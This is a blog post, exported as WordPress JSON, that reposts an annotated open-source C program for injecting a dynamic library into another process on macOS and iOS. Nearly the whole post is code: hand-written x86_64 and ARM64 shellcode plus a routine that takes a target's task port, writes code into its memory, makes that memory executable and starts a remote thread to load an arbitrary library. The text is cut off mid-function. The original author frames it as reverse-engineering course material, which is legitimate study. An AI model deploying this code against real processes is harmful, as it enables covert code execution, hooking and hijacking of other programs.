{"id":65,"date":"2016-12-11T11:02:37","date_gmt":"2016-12-11T11:02:37","guid":{"rendered":"http:\/\/piratesecurityblog.com\/?p=65"},"modified":"2017-11-13T11:04:36","modified_gmt":"2017-11-13T11:04:36","slug":"injection-in-osx","status":"publish","type":"post","link":"https:\/\/piratesecurityblog.com\/?p=65","title":{"rendered":"Lib Injection code In OSX"},"content":{"rendered":"

taken from :\u00a0http:\/\/newosxbook.com\/src.jl?tree=listings&file=inject.c<\/p>\n

this is an amazing injction Open Source for OSX<\/p>\n

 <\/p>\n

#include<\/span> <dlfcn.h><\/span>\r\n#include<\/span> <stdio.h><\/span>\r\n#include<\/span> <unistd.h><\/span>\r\n#include<\/span> <sys\/types.h><\/span>\r\n#include<\/span> <mach\/mach.h><\/span>\r\n#include<\/span> <mach\/error.h><\/span>\r\n#include<\/span> <errno.h><\/span>\r\n#include<\/span> <stdlib.h><\/span>\r\n#include<\/span> <sys\/sysctl.h><\/span>\r\n#include<\/span> <dlfcn.h><\/span>\r\n#include<\/span> <sys\/mman.h><\/span>\r\n\r\n#include<\/span> <sys\/stat.h><\/span>\r\n#include<\/span> <pthread.h><\/span>\r\n\r\n\r\n#ifdef<\/span> __arm64__\r\n\/\/#include \"mach\/arm\/thread_status.h\"<\/span>\r\n\r\n\/\/ Apple says: mach\/mach_vm.h:1:2: error: mach_vm.h unsupported<\/span>\r\n\/\/ And I say, bullshit.<\/span>\r\nkern_return_t<\/span> mach_vm_allocate\r\n(<\/span>\r\n        vm_map_t<\/span> target,<\/span>\r\n        mach_vm_address_t<\/span> *<\/span>address,<\/span>\r\n        mach_vm_size_t<\/span> size,<\/span>\r\n        int<\/span> flags\r\n);<\/span>\r\n\r\nkern_return_t<\/span> mach_vm_write\r\n(<\/span>\r\n        vm_map_t<\/span> target_task,<\/span>\r\n        mach_vm_address_t<\/span> address,<\/span>\r\n        vm_offset_t<\/span> data,<\/span>\r\n        mach_msg_type_number_t dataCnt\r\n);<\/span>\r\n\r\n\r\n\r\n\r\n#else<\/span>\r\n#include<\/span> <mach\/mach_vm.h><\/span>\r\n#endif<\/span>\r\n\r\n\r\n#define<\/span> STACK_SIZE 65536<\/span>\r\n#define<\/span> CODE_SIZE 128<\/span>\r\n\r\n\/\/ Due to popular request:<\/span>\r\n\/\/<\/span>\r\n\/\/ Simple injector example (and basis of coreruption tool).<\/span>\r\n\/\/<\/span>\r\n\/\/ If you've looked into research on injection techniques in OS X, you<\/span>\r\n\/\/ probably know about mach_inject. This tool, part of Dino Dai Zovi's<\/span>\r\n\/\/ excellent \"Mac Hacker's Handbook\" (a must read - kudos, DDZ) was<\/span>\r\n\/\/ created to inject code in PPC and i386. Since I couldn't find anything<\/span>\r\n\/\/ for x86_64 or ARM, I ended up writing my own tool.<\/span>\r\n\r\n\/\/ Since, this tool has exploded in functionality - with many other features,<\/span>\r\n\/\/ including scriptable debugging, fault injection, function hooking, code <\/span>\r\n\/\/ decryption,  and what not - which comes in *really* handy on iOS.<\/span>\r\n\/\/<\/span>\r\n\/\/ coreruption is still closed source, due its highly.. uhm.. useful<\/span>\r\n\/\/ nature. But I'm making this sample free, and I have fully annotated this.<\/span>\r\n\/\/ The rest of the stuff you need is in Chapters 11 and 12 MOXiI 1, with more<\/span>\r\n\/\/ to come in the 2nd Ed (..in time for iOS 9 :-)<\/span>\r\n\/\/<\/span>\r\n\/\/ Go forth and spread your code :-)<\/span>\r\n\/\/<\/span>\r\n\/\/ J (info@newosxbook.com) 02\/05\/2014<\/span>\r\n\/\/<\/span>\r\n\/\/ v2: With ARM64 -  06\/02\/2015 NOTE - ONLY FOR **ARM64**, NOT ARM32!<\/span>\r\n\/\/ Get the full bundle at - http:\/\/NewOSXBook.com\/files\/injarm64.tar<\/span>\r\n\/\/ with sample dylib and with script to compile this neatly.<\/span>\r\n\/\/<\/span>\r\n\/\/**********************************************************************<\/span>\r\n\/\/ Note ARM code IS messy, and I left the addresses wide apart. That's <\/span>\r\n\/\/ intentional. Basic ARM64 assembly will enable you to tidy this up and<\/span>\r\n\/\/ make the code more compact. <\/span>\r\n\/\/<\/span>\r\n\/\/ This is *not* meant to be neat - I'm just preparing this for TG's<\/span>\r\n\/\/ upcoming OS X\/iOS RE course (http:\/\/technologeeks.com\/OSXRE) and thought<\/span>\r\n\/\/ this would be interesting to share. See you all in MOXiI 2nd Ed!<\/span>\r\n\/\/**********************************************************************<\/span>\r\n\r\n\r\n\/\/ This sample code calls pthread_set_self to promote the injected thread<\/span>\r\n\/\/ to a pthread first - otherwise dlopen and many other calls (which rely<\/span>\r\n\/\/ on pthread_self()) will crash. <\/span>\r\n\/\/ It then calls dlopen() to load the library specified - which will trigger<\/span>\r\n\/\/ the library's constructor (q.e.d as far as code injection is concerned)<\/span>\r\n\/\/ and sleep for a long time. You can of course replace the sleep with<\/span>\r\n\/\/ another function, such as pthread_exit(), etc.<\/span>\r\n\/\/<\/span>\r\n\/\/ (For the constructor, use:<\/span>\r\n\/\/<\/span>\r\n\/\/ static void whicheverfunc() __attribute__((constructor));<\/span>\r\n\/\/<\/span>\r\n\/\/ in the library you inject)<\/span>\r\n\/\/<\/span>\r\n\/\/ Note that the functions are shown here as \"_PTHRDSS\", \"DLOPEN__\" and \"SLEEP___\".<\/span>\r\n\/\/ Reason being, that the above are merely placeholders which will be patched with<\/span>\r\n\/\/ the runtime addresses when code is actually injected.<\/span>\r\n\/\/<\/span>\r\nchar<\/span> injectedCode[]<\/span> =<\/span>\r\n#ifdef<\/span> X86_64\r\n\r\n     \/\/\"\\xcc\"                           \/\/  int3   <\/span>\r\n     \"<\/span>\\x<\/span>90\"<\/span>\t\t\t\t\/\/ nop..<\/span>\r\n     \"<\/span>\\x<\/span>55\"<\/span>                           \/\/ pushq  %rbp<\/span>\r\n     \"<\/span>\\x<\/span>48<\/span>\\x<\/span>89<\/span>\\x<\/span>e5\"<\/span>                   \/\/ movq   %rsp, %rbp<\/span>\r\n     \"<\/span>\\x<\/span>48<\/span>\\x<\/span>83<\/span>\\x<\/span>ec<\/span>\\x<\/span>20\"<\/span>               \/\/ subq   $32, %rsp<\/span>\r\n     \"<\/span>\\x<\/span>89<\/span>\\x<\/span>7d<\/span>\\x<\/span>fc\"<\/span>                   \/\/ movl   %edi, -4(%rbp)<\/span>\r\n     \"<\/span>\\x<\/span>48<\/span>\\x<\/span>89<\/span>\\x<\/span>75<\/span>\\x<\/span>f0\"<\/span>               \/\/ movq   %rsi, -16(%rbp)<\/span>\r\n     \"<\/span>\\x<\/span>b0<\/span>\\x<\/span>00\"<\/span>                                    \/\/ movb   $0, %al<\/span>\r\n     \/\/ call pthread_set_self <\/span>\r\n     \"<\/span>\\x<\/span>48<\/span>\\x<\/span>bf<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00\"<\/span>    \/\/ movabsq $0, %rdi<\/span>\r\n     \"<\/span>\\x<\/span>48<\/span>\\x<\/span>b8\"<\/span> \"_PTHRDSS\"<\/span>                           \/\/ movabsq $140735540045793, %rax<\/span>\r\n     \"<\/span>\\x<\/span>ff<\/span>\\x<\/span>d0\"<\/span>                                    \/\/    callq  *%rax<\/span>\r\n     \"<\/span>\\x<\/span>48<\/span>\\x<\/span>be<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00\"<\/span>    \/\/ movabsq $0, %rsi<\/span>\r\n     \"<\/span>\\x<\/span>48<\/span>\\x<\/span>8d<\/span>\\x<\/span>3d<\/span>\\x<\/span>2c<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00\"<\/span>                \/\/ leaq   44(%rip), %rdi<\/span>\r\n     \/\/ DLOpen...<\/span>\r\n     \"<\/span>\\x<\/span>48<\/span>\\x<\/span>b8\"<\/span> \"DLOPEN__\"<\/span> \/\/ movabsq $140735516395848, %rax<\/span>\r\n     \"<\/span>\\x<\/span>48<\/span>\\x<\/span>be<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00\"<\/span> \/\/  movabsq $0, %rsi<\/span>\r\n     \"<\/span>\\x<\/span>ff<\/span>\\x<\/span>d0\"<\/span>                       \/\/   callq  *%rax<\/span>\r\n     \/\/ Sleep(1000000)...<\/span>\r\n     \"<\/span>\\x<\/span>48<\/span>\\x<\/span>bf<\/span>\\x<\/span>00<\/span>\\x<\/span>e4<\/span>\\x<\/span>0b<\/span>\\x<\/span>54<\/span>\\x<\/span>02<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00\"<\/span> \/\/  movabsq $10000000000, %rdi<\/span>\r\n     \"<\/span>\\x<\/span>48<\/span>\\x<\/span>b8\"<\/span> \"SLEEP___\"<\/span> \/\/ movabsq $140735516630165, %rax<\/span>\r\n     \"<\/span>\\x<\/span>ff<\/span>\\x<\/span>d0\"<\/span>            \/\/              callq  *%rax<\/span>\r\n\r\n     \/\/ plenty of space for a full path name here<\/span>\r\n     \"LIBLIBLIBLIB\"<\/span> \"<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00\"<\/span>\r\n     \"<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00\"<\/span>\r\n     \"<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00\"<\/span>\r\n     \"<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>00\"<\/span>\r\n;<\/span>\r\n\r\n#else<\/span>\r\n \r\n   \/\/ That's the ARM64 \"shellcode\"<\/span>\r\n   \"<\/span>\\x<\/span>08<\/span>\\x<\/span>03<\/span>\\x<\/span>00<\/span>\\x<\/span>58\"<\/span> \/\/ LDR X8, #3 ; load PTHREADSS<\/span>\r\n   \"<\/span>\\x<\/span>00<\/span>\\x<\/span>01<\/span>\\x<\/span>3f<\/span>\\x<\/span>d6\"<\/span> \/\/ BLR X8     ; do pthread_set_self<\/span>\r\n  \r\n    \"<\/span>\\x<\/span>00<\/span>\\x<\/span>01<\/span>\\x<\/span>00<\/span>\\x<\/span>10\"<\/span> \/\/ ADR X0, #32<\/span>\r\n   \"<\/span>\\x<\/span>00<\/span>\\x<\/span>40<\/span>\\x<\/span>01<\/span>\\x<\/span>91\"<\/span>  \/\/ ADD x0, x0, #0x50  ; X0 => \"LIBLIBLIB...\";<\/span>\r\n   \"<\/span>\\x<\/span>08<\/span>\\x<\/span>03<\/span>\\x<\/span>00<\/span>\\x<\/span>58\"<\/span>  \/\/ LDR X8, #3 ; load DLOPEN<\/span>\r\n   \"<\/span>\\x<\/span>01<\/span>\\x<\/span>00<\/span>\\x<\/span>80<\/span>\\x<\/span>d2\"<\/span>  \/\/ MOVZ X1, 0 ; X1 = 0;<\/span>\r\n   \"<\/span>\\x<\/span>29<\/span>\\x<\/span>01<\/span>\\x<\/span>00<\/span>\\x<\/span>91\"<\/span>  \/\/ ADD   x9, x9, 0  - I left this as a nop<\/span>\r\n   \/\/ dlopen(\"LIBLIBLIB\", 0);<\/span>\r\n   \"<\/span>\\x<\/span>00<\/span>\\x<\/span>01<\/span>\\x<\/span>3f<\/span>\\x<\/span>d6\"<\/span>  \/\/ BLR X8     ; do dlopen()<\/span>\r\n   \"<\/span>\\x<\/span>a8<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>58\"<\/span>  \/\/ LDR X8, #12 ; load PTHREADEXT<\/span>\r\n   \"<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>80<\/span>\\x<\/span>d2\"<\/span>  \/\/ MOVZ X0, 0 ; X1 = 0;<\/span>\r\n   \"<\/span>\\x<\/span>00<\/span>\\x<\/span>01<\/span>\\x<\/span>3f<\/span>\\x<\/span>d6\"<\/span>  \/\/ BLR X8     ; do pthread_exit<\/span>\r\n   \"<\/span>\\x<\/span>00<\/span>\\x<\/span>00<\/span>\\x<\/span>20<\/span>\\x<\/span>d4\"<\/span>  \/\/ BRK X0     ; \/\/ useful if you need a break :)<\/span>\r\n    \"XXXX\"<\/span> \r\n    \"PTHRDEXT\"<\/span>   \/\/ <-<\/span>\r\n    \"AAAA\"<\/span>\r\n    \"BCDEFGHI\"<\/span>\r\n    \"JKLMNOPR\"<\/span>\r\n    \"STUVWXYZ\"<\/span>\r\n    \"!!!!!!!!\"<\/span>\r\n    \"_PTHRDSS\"<\/span>  \/\/ <-<\/span>\r\n    \"PTHRDEXT\"<\/span>  \/\/<\/span>\r\n    \"DLOPEN__\"<\/span>  \/\/ <- <\/span>\r\n    \"LIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIB\"<\/span> \r\n    \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span>\r\n    \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span>\r\n    \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span>\r\n    \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span>\r\n    \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> \"<\/span>\\x<\/span>00\"<\/span> ;<\/span>\r\n\r\n#endif<\/span>\r\n\r\nint<\/span> inject<\/span>(<\/span>pid_t<\/span> pid,<\/span> const<\/span> char<\/span> *<\/span>lib)<\/span> {<\/span>\r\n\r\ntask_t<\/span> remoteTask;<\/span>\r\n\r\nstruct<\/span> stat<\/span> buf;<\/span>\r\n\r\n\/**<\/span>\r\n  * First, check we have the library. Otherwise, we won't be able to inject..<\/span>\r\n  *\/<\/span>\r\n\r\n  int<\/span> rc =<\/span> stat<\/span> (<\/span>lib,<\/span> &<\/span>buf);<\/span>\r\n\r\n  if<\/span> (<\/span>rc !=<\/span> 0<\/span>)<\/span>\r\n  {<\/span>\r\n   fprintf<\/span> (<\/span>stderr,<\/span> \"Unable to open library file %s (%s) - Cannot inject<\/span>\\n<\/span>\"<\/span>,<\/span> lib,<\/span>strerror<\/span> (<\/span>errno));<\/span>\r\n   \/\/return (-9);<\/span>\r\n   }<\/span>\r\n\r\nmach_error_t<\/span> kr =<\/span> 0<\/span>;<\/span>\r\n\r\n\/**<\/span>\r\n  * Second - the critical part - we need task_for_pid in order to get the task port of the target<\/span>\r\n  * pid. This is our do-or-die: If we get the port, we can do *ANYTHING* we want. If we don't, we're<\/span>\r\n  * #$%#$%. <\/span>\r\n  *<\/span>\r\n  * In iOS, this will require the task_for_pid-allow entitlement. In OS X, this will require getting past<\/span>\r\n  * taskgated, but root access suffices for that.<\/span>\r\n  *<\/span>\r\n  *\/<\/span>\r\nkr =<\/span> task_for_pid<\/span>(<\/span>mach_task_self<\/span>(),<\/span> pid,<\/span> &<\/span>remoteTask);<\/span>\r\nif<\/span> (<\/span>kr !=<\/span> KERN_SUCCESS)<\/span> {<\/span>\r\n\r\n\tfprintf<\/span> (<\/span>stderr,<\/span> \"Unable to call task_for_pid on pid %d: %s. Cannot continue!<\/span>\\n<\/span>\"<\/span>,<\/span>pid,<\/span> mach_error_string<\/span>(<\/span>kr));<\/span>\r\n\treturn<\/span> (-<\/span>1<\/span>);<\/span>\r\n}<\/span>\r\n\r\n\r\n\r\n \r\n\r\n\r\n\/**<\/span>\r\n * From here on, it's pretty much straightforward -<\/span>\r\n * Allocate stack and code. We don't really care *where* they get allocated. Just that they get allocated.<\/span>\r\n * So, first, stack:<\/span>\r\n *\/<\/span>\r\nmach_vm_address_t<\/span> remoteStack64 =<\/span> (<\/span>vm_address_t)<\/span> NULL;<\/span>\r\nmach_vm_address_t<\/span> remoteCode64 =<\/span> (<\/span>vm_address_t)<\/span> NULL;<\/span>\r\nkr =<\/span> mach_vm_allocate<\/span>(<\/span> remoteTask,<\/span> &<\/span>remoteStack64,<\/span> STACK_SIZE,<\/span> VM_FLAGS_ANYWHERE);<\/span>\r\n   \r\nif<\/span> (<\/span>kr !=<\/span> KERN_SUCCESS)<\/span>\r\n\t{<\/span>\r\n\t\tfprintf<\/span>(<\/span>stderr,<\/span>\"Unable to allocate memory for remote stack in thread: Error %s<\/span>\\n<\/span>\"<\/span>,<\/span> mach_error_string<\/span>(<\/span>kr));<\/span>\r\n\t\treturn<\/span> (-<\/span>2<\/span>);<\/span>\r\n\t}<\/span>\r\nelse<\/span>\r\n{<\/span>\r\n\r\n\tfprintf<\/span> (<\/span>stderr,<\/span> \"Allocated remote stack @0x%llx<\/span>\\n<\/span>\"<\/span>,<\/span> remoteStack64);<\/span>\r\n\r\n}<\/span>\r\n\/**<\/span>\r\n * Then we allocate the memory for the thread<\/span>\r\n *\/<\/span>\r\nremoteCode64 =<\/span> (<\/span>vm_address_t)<\/span> NULL;<\/span>\r\nkr =<\/span> mach_vm_allocate<\/span>(<\/span> remoteTask,<\/span> &<\/span>remoteCode64,<\/span> CODE_SIZE,<\/span> VM_FLAGS_ANYWHERE );<\/span>\r\n\r\nif<\/span> (<\/span>kr !=<\/span> KERN_SUCCESS)<\/span>\r\n\t{<\/span>\r\n\t\tfprintf<\/span>(<\/span>stderr,<\/span>\"Unable to allocate memory for remote code in thread: Error %s<\/span>\\n<\/span>\"<\/span>,<\/span> mach_error_string<\/span>(<\/span>kr));<\/span>\r\n\t\treturn<\/span> (-<\/span>2<\/span>);<\/span>\r\n\t}<\/span>\r\n\r\n\r\n \r\n \/**<\/span>\r\n   * Patch code before injecting: That is, insert correct function addresses (and lib name) into placeholders<\/span>\r\n   *<\/span>\r\n   * Since we use the same shared library cache as our victim, meaning we can use memory addresses from<\/span>\r\n   * OUR address space when we inject..<\/span>\r\n   *\/<\/span>\r\n\r\n int<\/span> i =<\/span> 0<\/span>;<\/span>\r\n char<\/span> *<\/span>possiblePatchLocation =<\/span> (<\/span>injectedCode );<\/span>\r\n for<\/span> (<\/span>i =<\/span> 0<\/span> ;<\/span> i <<\/span> 0x100<\/span>;<\/span> i++)<\/span>\r\n  {<\/span>\r\n\r\n\t\/\/ Patching is crude, but works.<\/span>\r\n  \t\/\/<\/span>\r\n\textern<\/span> void<\/span> *<\/span>_pthread_set_self;<\/span>\r\n\tpossiblePatchLocation++;<\/span>\r\n\r\n\t\r\n\tuint64_t<\/span> addrOfPthreadSetSelf =<\/span> dlsym<\/span> (<\/span> RTLD_DEFAULT,<\/span> \"_pthread_set_self\"<\/span>);<\/span> \/\/(uint64_t) _pthread_set_self;<\/span>\r\n\tuint64_t<\/span> addrOfPthreadExit =<\/span> dlsym<\/span> (<\/span>RTLD_DEFAULT,<\/span> \"pthread_exit\"<\/span>);<\/span> \/\/(uint64_t) _pthread_set_self;<\/span>\r\n        uint64_t<\/span> addrOfDlopen =<\/span> (<\/span>uint64_t)<\/span> dlopen;<\/span>\r\n        uint64_t<\/span> addrOfSleep =<\/span> (<\/span>uint64_t)<\/span> sleep;<\/span> \/\/ pthread_exit;<\/span>\r\n\r\n\tif<\/span> (<\/span>memcmp<\/span> (<\/span>possiblePatchLocation,<\/span> \"PTHRDEXT\"<\/span>,<\/span> 8<\/span>)<\/span> ==<\/span> 0<\/span>)<\/span>\r\n\t{<\/span>\r\n\t   memcpy<\/span>(<\/span>possiblePatchLocation,<\/span> &<\/span>addrOfPthreadExit,<\/span>8<\/span>);<\/span>\r\n\r\n\t   printf<\/span> (<\/span>\"Pthread exit  @%llx, %llx<\/span>\\n<\/span>\"<\/span>,<\/span> addrOfPthreadExit,<\/span> pthread_exit);<\/span>\r\n\t}<\/span>\r\n\r\n\tif<\/span> (<\/span>memcmp<\/span> (<\/span>possiblePatchLocation,<\/span> \"_PTHRDSS\"<\/span>,<\/span> 8<\/span>)<\/span> ==<\/span> 0<\/span>)<\/span>\r\n\t{<\/span>\r\n\t   memcpy<\/span>(<\/span>possiblePatchLocation,<\/span> &<\/span>addrOfPthreadSetSelf,<\/span>8<\/span>);<\/span>\r\n\r\n\t   printf<\/span> (<\/span>\"Pthread set self @%llx<\/span>\\n<\/span>\"<\/span>,<\/span> addrOfPthreadSetSelf);<\/span>\r\n\t}<\/span>\r\n\r\n\tif<\/span> (<\/span>memcmp<\/span>(<\/span>possiblePatchLocation,<\/span> \"DLOPEN__\"<\/span>,<\/span> 6<\/span>)<\/span> ==<\/span> 0<\/span>)<\/span>\r\n\t{<\/span>\r\n\t   printf<\/span> (<\/span>\"DLOpen @%llx<\/span>\\n<\/span>\"<\/span>,<\/span> addrOfDlopen);<\/span>\r\n\t   memcpy<\/span>(<\/span>possiblePatchLocation,<\/span> &<\/span>addrOfDlopen,<\/span> sizeof<\/span>(<\/span>uint64_t));<\/span>\r\n\r\n\t}<\/span>\r\n\r\n\tif<\/span> (<\/span>memcmp<\/span>(<\/span>possiblePatchLocation,<\/span> \"SLEEP___\"<\/span>,<\/span> 6<\/span>)<\/span> ==<\/span> 0<\/span>)<\/span>\r\n\t{<\/span>\r\n\t   printf<\/span> (<\/span>\"Sleep @%llx<\/span>\\n<\/span>\"<\/span>,<\/span> addrOfSleep);<\/span>\r\n\t   memcpy<\/span>(<\/span>possiblePatchLocation,<\/span> &<\/span>addrOfSleep,<\/span> sizeof<\/span>(<\/span>uint64_t));<\/span>\r\n\r\n\t}<\/span>\r\n\r\n\tif<\/span> (<\/span>memcmp<\/span>(<\/span>possiblePatchLocation,<\/span> \"LIBLIBLIB\"<\/span>,<\/span> 9<\/span>)<\/span> ==<\/span> 0<\/span>)<\/span>\r\n\t{<\/span>\r\n\r\n\t   strcpy<\/span>(<\/span>possiblePatchLocation,<\/span> lib );<\/span>\r\n\r\n\t}<\/span>\r\n\t\r\n\r\n\r\n\r\n\r\n  }<\/span>\r\n\r\n\t\/**<\/span>\r\n  \t  * Write the (now patched) code<\/span>\r\n\t  *\/<\/span>\r\n\tkr =<\/span> mach_vm_write<\/span>(<\/span>remoteTask,<\/span>                   \/\/ Task port<\/span>\r\n\t                   remoteCode64,<\/span>                 \/\/ Virtual Address (Destination)<\/span>\r\n\t                   (<\/span>vm_address_t)<\/span> injectedCode,<\/span>  \/\/ Source<\/span>\r\n\t                    0xa9<\/span>);<\/span>                       \/\/ Length of the source<\/span>\r\n\r\n\r\n\r\n       if<\/span> (<\/span>kr !=<\/span> KERN_SUCCESS)<\/span>\r\n\t{<\/span>\r\n\t\tfprintf<\/span>(<\/span>stderr,<\/span>\"Unable to write remote thread memory: Error %s<\/span>\\n<\/span>\"<\/span>,<\/span> mach_error_string<\/span>(<\/span>kr));<\/span>\r\n\t\treturn<\/span> (-<\/span>3<\/span>);<\/span>\r\n\t}<\/span>\r\n\r\n\r\n        \/*<\/span>\r\n\t * Mark code as executable - This also requires a workaround on iOS, btw.<\/span>\r\n\t *\/<\/span>\r\n\t\r\n        kr  =<\/span> vm_protect<\/span>(<\/span>remoteTask,<\/span> remoteCode64,<\/span> 0x70<\/span>,<\/span> FALSE,<\/span> VM_PROT_READ |<\/span> VM_PROT_EXECUTE);<\/span>\r\n\r\n\t\/*<\/span>\r\n   \t * Mark stack as writable  - not really necessary <\/span>\r\n\t *\/<\/span>\r\n\r\n        kr  =<\/span> vm_protect<\/span>(<\/span>remoteTask,<\/span> remoteStack64,<\/span> STACK_SIZE,<\/span> TRUE,<\/span> VM_PROT_READ |<\/span> VM_PROT_WRITE);<\/span>\r\n\t\r\n\r\n        if<\/span> (<\/span>kr !=<\/span> KERN_SUCCESS)<\/span>\r\n\t{<\/span>\r\n\t\tfprintf<\/span>(<\/span>stderr,<\/span>\"Unable to set memory permissions for remote thread: Error %s<\/span>\\n<\/span>\"<\/span>,<\/span> mach_error_string<\/span>(<\/span>kr));<\/span>\r\n\t\treturn<\/span> (-<\/span>4<\/span>);<\/span>\r\n\t}<\/span>\r\n\r\n\r\n        \/**<\/span>\r\n \t  *<\/span>\r\n \t  * Create thread - This is obviously hardware specific.  <\/span>\r\n\t  *<\/span>\r\n\t  *\/<\/span>\r\n\r\n#ifdef<\/span> X86_64\r\n        x86_thread_state64_t<\/span> remoteThreadState64;<\/span>\r\n#else<\/span>\r\n\t\/\/ Using unified thread state for backporting to ARMv7, if anyone's interested..<\/span>\r\n\tstruct<\/span> arm_unified_thread_state<\/span> remoteThreadState64;<\/span>\r\n#endif<\/span>\r\n        thread_act_t<\/span>         remoteThread;<\/span>\r\n\r\n        memset<\/span>(&<\/span>remoteThreadState64,<\/span> '<\/span>\\0<\/span>'<\/span>,<\/span> sizeof<\/span>(<\/span>remoteThreadState64)<\/span> );<\/span>\r\n\r\n        remoteStack64 +=<\/span> (<\/span>STACK_SIZE \/<\/span> 2<\/span>);<\/span> \/\/ this is the real stack<\/span>\r\n\t\/\/remoteStack64 -= 8;  \/\/ need alignment of 16<\/span>\r\n\r\n        const<\/span> char<\/span>*<\/span> p =<\/span> (<\/span>const<\/span> char<\/span>*)<\/span> remoteCode64;<\/span>\r\n#ifdef<\/span> X86_64\r\n        remoteThreadState64.<\/span>__rip =<\/span> (<\/span>u_int64_t)<\/span> (<\/span>vm_address_t)<\/span> remoteCode64;<\/span>\r\n\r\n        \/\/ set remote Stack Pointer<\/span>\r\n        remoteThreadState64.<\/span>__rsp =<\/span> (<\/span>u_int64_t)<\/span> remoteStack64;<\/span>\r\n        remoteThreadState64.<\/span>__rbp =<\/span> 